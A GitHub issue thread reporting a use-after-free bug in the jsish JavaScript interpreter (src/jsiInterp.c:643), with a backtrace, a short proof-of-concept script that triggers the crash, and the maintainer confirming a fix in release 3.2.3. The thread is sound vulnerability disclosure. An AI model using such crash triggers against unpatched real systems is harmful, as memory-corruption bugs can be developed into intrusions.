Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Use After Free in JsiInterp:643 #18

Closed
SteinsGatep001 opened this issue Oct 13, 2020 · 4 comments
Closed

Use After Free in JsiInterp:643 #18

SteinsGatep001 opened this issue Oct 13, 2020 · 4 comments

Comments

@SteinsGatep001
Copy link

Description

When jsi_DecrRefCount calls the jsi_freeValueEntry function, it incorrectly references the heap block that has been freed by jsi_freeValueEntry (src/jsiInterp.c:643), causing the Use After Free vulnerability

Build Environment

Ubuntu 16.04 x86_64
gcc version 6.5.0 20181026

Debug Information

image
backtrace

//...
Program received signal SIGABRT
// ...
#4  0x00000000004249e1 in jsi_freeValueEntry (interp=0x83d010, hPtr=0x8ce930, ptr=0x8cd110) at src/jsiInterp.c:643
#5  0x000000000044c446 in Jsi_HashClear (tablePtr=0x849350) at src/jsiHash.c:507
#6  0x000000000044c53b in Jsi_HashDelete (tablePtr=0x849350) at src/jsiHash.c:526
#7  0x0000000000429975 in jsiInterpDelete (interp=0x83d010, unused=0x83d010) at src/jsiInterp.c:1849
#8  0x000000000042a3fd in Jsi_EventuallyFree (interp=0x83d010, data=0x83d010, proc=0x4291ec <jsiInterpDelete>) at src/jsiInterp.c:1987
#9  0x000000000042a19a in Jsi_InterpDelete (interp=0x83d010) at src/jsiInterp.c:1941
#10 0x000000000059ad50 in jsi_main (argc=0x2, argv=0x7fffffffdfd8) at src/main.c:46
#11 0x000000000059ad9f in main (argc=0x2, argv=0x7fffffffdfd8) at src/main.c:52
@SteinsGatep001
Copy link
Author

PoC

var global = this;
(function () {
    try {
        throw function () {
            this.global = 'test';
        };
    } catch (e) {
    }
}());
this.global = 'test'; // trigger use after free

pcmacdon pushed a commit that referenced this issue Oct 13, 2020
FossilOrigin-Name: 930e210f5d990ed4953cf49cb9d7528247c0d55d19b9158d60cec49f46649986
@pcmacdon
Copy link
Owner

Great find of problem from code that was supposed to be removed a long time ago. Fixed in Release "3.2.3"

@SteinsGatep001
Copy link
Author

Great find of problem from code that was supposed to be removed a long time ago. Fixed in Release "3.2.3"

The source code I use is http://jsish.org/zip

Build Environment

Ubuntu 16.04 x86_64
wget http://jsish.org/zip -O jsi.zip && unzip jsi.zip && cd jsi && make

@pcmacdon
Copy link
Owner

I probably wasn't clear. I meant yes you did find a problem.

But it should be fixed now, in the code I just committed today for "3.2.3".

$ jsish -v
3.2.3 3.0203 84f5b80e64d1abdcf634e27cb6b86dce8e8c87ed 2020-10-14 00:32:37 UTC
$ jsish /tmp/glob.jsi
$ cat /tmp/glob.jsi 
var global = this;
(function () {
    try {
        throw function () {
            this.global = 'test';
        };
    } catch (e) {
    }
}());
this.global = 'test'; // trigger use after free

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants